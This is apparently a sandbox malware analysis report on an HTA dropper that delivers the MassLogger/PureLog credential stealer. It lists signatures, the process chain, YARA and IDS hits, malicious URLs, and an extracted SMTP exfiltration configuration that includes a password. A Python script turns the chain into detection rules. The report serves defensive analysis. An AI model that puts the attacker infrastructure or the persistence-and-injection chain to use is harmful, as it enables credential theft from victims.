
Windows Analysis Report
Ziraat_Swift.hta

Overview

General Information

Sample name: Ziraat_Swift.hta
Analysis ID: 1566438
MD5: 42080886d61700323e62d2de3a32454d
SHA1: 0d499a3a4b044cdd2685c2df7de1c4ebe740703f
SHA256: 5f0d6bb3445ed0c410b2dd8874cf7fc7b1c4e06cc2e620790eb782f2c339c796
Tags: hta, user-lowmal3

Detection

MassLogger RAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to behave differently if executed on a Russian/Kazakh computer
Creates files in the system32 config directory
Drops VBS files to the startup folder
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes data at the end of the disk (often used by bootkits to hide malicious code)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Spawns drivers
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7212 cmdline: mshta.exe "C:\Users\user\Desktop\Ziraat_Swift.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • x.exe (PID: 7340 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 60633CA891471EE569DFF187A7C5FF59)
      • differences.exe (PID: 7436 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 60633CA891471EE569DFF187A7C5FF59)
        • RegSvcs.exe (PID: 7496 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • armsvc.exe (PID: 7380 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: C8BF45BDD9AC7A2C04E7836B9AC9D15E)
  • alg.exe (PID: 7412 cmdline: C:\Windows\System32\alg.exe MD5: 70BB2AC3B1D5DF22D2B74DA852AD13AA)
  • elevation_service.exe (PID: 7568 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 325FCE66CB0133E663D042F034BDE5AF)
  • maintenanceservice.exe (PID: 7624 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: FED16854B8EA309A65BF6450ECACF0D0)
  • wscript.exe (PID: 7760 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • differences.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\subpredicate\differences.exe" MD5: 60633CA891471EE569DFF187A7C5FF59)
      • RegSvcs.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Local\subpredicate\differences.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • differences.exe (PID: 7896 cmdline: "C:\Users\user\AppData\Local\subpredicate\differences.exe" MD5: 60633CA891471EE569DFF187A7C5FF59)
        • RegSvcs.exe (PID: 8008 cmdline: "C:\Users\user\AppData\Local\subpredicate\differences.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 7280 cmdline: C:\Windows\system32\AppVClient.exe MD5: D57EFB62378CB9FE5ABA5C4735D90C00)
  • FXSSVC.exe (PID: 7628 cmdline: C:\Windows\system32\fxssvc.exe MD5: B7AC35C8D5EC032758BDF18DAF940E76)
  • msdtc.exe (PID: 4928 cmdline: C:\Windows\System32\msdtc.exe MD5: 6B414CB462A630E3121C6075205CFF23)
  • PerceptionSimulationService.exe (PID: 7768 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 4E2ACC748CE94AC4AC70C66C0815F52C)
  • perfhost.exe (PID: 7792 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 44C283F4BD1BAB81C2FA725DEF4F6B81)
  • Locator.exe (PID: 7832 cmdline: C:\Windows\system32\locator.exe MD5: DCAC6C83695DE7AFC6FBC22B2463934D)
  • SensorDataService.exe (PID: 7844 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 723558C0A185F957C2EBE638F8BBB34E)
  • snmptrap.exe (PID: 7984 cmdline: C:\Windows\System32\snmptrap.exe MD5: B2CFA94DAEAB765B33AE6E7BD777C6D9)

Malware Configuration

{"EXfil Mode": "SMTP", "From": "info2@j-fores.com", "Password": "london@1759", "Server": "s82.gocheapweb.com", "To": "info@j-fores.com", "Port": 587}
Yara matches: memory dumps

Source | Rule | Description | Author
0000000C.00000002.1924522530.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 5A 88 44 24 2B 88 44 24 2F B0 6B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
00000005.00000002.2946618374.0000000002B60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000F.00000002.2945957784.0000000003070000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(the full report lists 22 memory-dump matches; only the first are reproduced here)

The RedLine hit is weak evidence on its own: $s5 (delete[]) and $s6 (constructor or from DllMain.) are standard MSVC C-runtime strings, $s4 is a generic compiler artifact rather than malware-specific code, and the report's verdict does not name RedLine. The classification rests on the matches against the unpacked RegSvcs.exe payload below.

Yara matches: unpacked PEs

Source | Rule | Description | Author
15.2.RegSvcs.exe.2d30ee8.2.raw.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
15.2.RegSvcs.exe.2d30ee8.2.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
15.2.RegSvcs.exe.2d30ee8.2.raw.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
15.2.RegSvcs.exe.2d30ee8.2.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
15.2.RegSvcs.exe.2d30ee8.2.raw.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x1d74b:$a1: get_encryptedPassword
  • 0x1d71f:$a2: get_encryptedUsername
  • 0x1d7e3:$a3: get_timePasswordChanged
  • 0x1d6fb:$a4: get_passwordField
  • 0x1d761:$a5: set_encryptedPassword
  • 0x1d52e:$a7: get_logins
  • 0x1cab8:$a8: GetOutlookPasswords
  • 0x1bfe1:$a9: StartKeylogger
  • 0x1a943:$a10: KeyLoggerEventArgs
  • 0x1a912:$a11: KeyLoggerEventArgsEventHandler
  • 0x1d602:$a13: _encryptedPassword
(the full report lists 87 unpacked-PE matches; only the first are reproduced here)

The $a strings are .NET member names left in the unpacked payload (Firefox login-store accessors, GetOutlookPasswords, StartKeylogger) and corroborate the browser-credential, mail-credential and keylogger signatures listed above; several stealer rules firing on the same .NET payload is expected, since these families share credential-harvesting code.

                  System Summary

Source: File created | Author: frack113, Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 7212, TargetFilename: C:\Users\user\AppData\Local\Temp\x.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs" , ProcessId: 7760, ProcessName: wscript.exe
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Users\user\AppData\Local\Temp\x.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\subpredicate\differences.exe, ParentProcessId: 7436, ParentProcessName: differences.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ProcessId: 7496, ProcessName: RegSvcs.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs" , ProcessId: 7760, ProcessName: wscript.exe

                  Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\subpredicate\differences.exe, ProcessId: 7436, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs
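The Sigma hits in the System Summary and Data Obfuscation sections describe one chain: mshta.exe writes x.exe to Temp, the loader drops a .vbs into the user's Startup folder, wscript.exe launches it at logon, and RegSvcs.exe is started with a command line that names a different executable. The block below is an added example, not part of the Joe Sandbox report or of the Sigma rules it cites: it expresses those four tells as host-side rules and runs them over event records constructed to mirror the Sysmon fields quoted above (plus two benign controls). The rule names, the extension lists and the benign records are assumptions; the paths, PIDs and command lines of the first four records are taken from the report.

```python
import ntpath
import re

# Constructed event records mirroring the Sysmon fields quoted in the report
# (EventID 1 = process create, EventID 11 = file create). Only these keys are
# read, so the rules also run over real Sysmon JSON with the same field names.
SAMPLE_EVENTS = [
    {"EventID": 11, "ProcessId": 7212, "Image": r"C:\Windows\SysWOW64\mshta.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\x.exe"},
    {"EventID": 11, "ProcessId": 7436,
     "Image": r"C:\Users\user\AppData\Local\subpredicate\differences.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs"},
    {"EventID": 1, "ProcessId": 7760, "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": "",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs"'},
    {"EventID": 1, "ProcessId": 7496,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\subpredicate\differences.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\Temp\x.exe"'},
    # Two constructed benign controls: a normal RegSvcs run and an unrelated temp file.
    {"EventID": 1, "ProcessId": 4242,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "ParentImage": r"C:\Program Files\Vendor\setup.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" "C:\Program Files\Vendor\Component.dll"'},
    {"EventID": 11, "ProcessId": 5000, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\Temp\report.tmp"},
]

STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
PE_EXTS = {".exe", ".dll", ".scr"}
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".bat", ".cmd", ".ps1"}
DOTNET_UTILS = {"regsvcs.exe", "regasm.exe"}  # the utilities named by the report's Sigma hit


def base(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(path).lower()


def split_cmdline(cmdline: str) -> list:
    """Tokenise a Windows command line: quoted tokens keep their spaces, quotes are dropped."""
    return [q or u for q, u in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def check_event(ev: dict) -> list:
    """Return (rule, pid, detail) tuples for every rule the event trips."""
    findings = []
    image = base(ev.get("Image", ""))
    if ev.get("EventID") == 11:
        target = ev.get("TargetFilename", "")
        ext = ntpath.splitext(target)[1].lower()
        if image in SCRIPT_HOSTS and ext in PE_EXTS:
            findings.append(("script_host_dropped_pe", ev["ProcessId"], f"{image} wrote {target}"))
        if STARTUP_RE.search(target) and ext in SCRIPT_EXTS:
            findings.append(("script_in_startup", ev["ProcessId"], f"{ev['Image']} wrote {target}"))
    elif ev.get("EventID") == 1:
        tokens = split_cmdline(ev.get("CommandLine", ""))
        if image in {"wscript.exe", "cscript.exe"} and any(STARTUP_RE.search(t) for t in tokens[1:]):
            findings.append(("script_host_runs_startup_script", ev["ProcessId"], ev["CommandLine"]))
        if image in DOTNET_UTILS:
            # The injected RegSvcs.exe in the report was created with the loader's own
            # command line, so argv[0] no longer names the image; a parent living in a
            # user-writable directory is the second tell.
            reasons = []
            if tokens and base(tokens[0]) != image:
                reasons.append(f"command line names {tokens[0]}, not the image")
            if USER_WRITABLE_RE.search(ev.get("ParentImage", "")):
                reasons.append(f"parent {ev['ParentImage']} is in a user-writable directory")
            if reasons:
                findings.append(("dotnet_util_hollowing_indicator", ev["ProcessId"], "; ".join(reasons)))
    return findings


def run(events) -> list:
    """Apply check_event to a stream of events and collect the findings in order."""
    return [f for ev in events for f in check_event(ev)]


if __name__ == "__main__":
    for rule, pid, detail in run(SAMPLE_EVENTS):
        print(f"[{rule}] pid={pid}: {detail}")
```

Run over the constructed stream this yields exactly four findings, one per stage of the chain, and nothing for the two controls. The command-line/image mismatch is the check worth keeping even where the other three are noisy: a legitimate RegSvcs.exe or RegAsm.exe invocation always names itself in argv[0].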
Suricata IDS Alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-02T07:56:26.236257+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.4 | 52629 | 1.1.1.1 | 53 | UDP
2024-12-02T07:56:17.558035+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.4 | 62334 | 1.1.1.1 | 53 | UDP
2024-12-02T07:56:10.027681+0100 | 2018141 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.4 | 49731 | TCP
2024-12-02T07:56:13.018778+0100 | 2018141 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.4 | 49734 | TCP
2024-12-02T07:56:17.612052+0100 | 2018141 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.4 | 49737 | TCP
2024-12-02T07:57:55.225518+0100 | 2018141 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.4 | 49872 | TCP
2024-12-02T07:57:58.046080+0100 | 2018141 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.4 | 49881 | TCP
2024-12-02T07:56:10.027681+0100 | 2037771 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.4 | 49731 | TCP
2024-12-02T07:56:13.018778+0100 | 2037771 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.4 | 49734 | TCP
2024-12-02T07:56:17.612052+0100 | 2037771 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.4 | 49737 | TCP
2024-12-02T07:57:55.225518+0100 | 2037771 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.4 | 49872 | TCP
2024-12-02T07:57:58.046080+0100 | 2037771 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.4 | 49881 | TCP
2024-12-02T07:56:15.319591+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49733 | 193.122.130.0 | 80 | TCP
2024-12-02T07:56:27.710262+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49749 | 193.122.130.0 | 80 | TCP
2024-12-02T07:56:24.097750+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49744 | 54.244.188.177 | 80 | TCP
2024-12-02T07:57:38.022398+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49790 | 82.112.184.197 | 80 | TCP


                  AV Detection

The W32/Infector.Gen and Joe Sandbox ML hits on paths under Program Files below are on the host's own vendor binaries after the infector rewrote them (see Spreading), not on components the sample dropped; static coverage of the HTA itself was low at analysis time (8% on VirusTotal), so the verdict rests on the extracted configuration and the behaviour.

Source: http://ww99.przvgke.biz/widfafwxfswriju | Avira URL Cloud: Label: malware
Source: http://ww7.przvgke.biz/widfafwxfswrij?usid=26&utid=9204703590 | Avira URL Cloud: Label: malware
Source: http://ww99.przvgke.biz/widfafwxfswrij | Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/jenyp?usid=26&utid=9204704395 | Avira URL Cloud: Label: malware
Source: http://ww99.przvgke.biz/jenyp | Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack | Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "info2@j-fores.com", "Password": "london@1759", "Server": "s82.gocheapweb.com", "To": "info@j-fores.com", "Port": 587}
Source: ww99.przvgke.biz | Virustotal: Detection: 11%
Source: ww99.fwiwk.biz | Virustotal: Detection: 13%
Source: ww7.fwiwk.biz | Virustotal: Detection: 14%
Source: ww7.przvgke.biz | Virustotal: Detection: 13%
Source: Ziraat_Swift.hta | Virustotal: Detection: 8%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | Joe Sandbox ML: detected
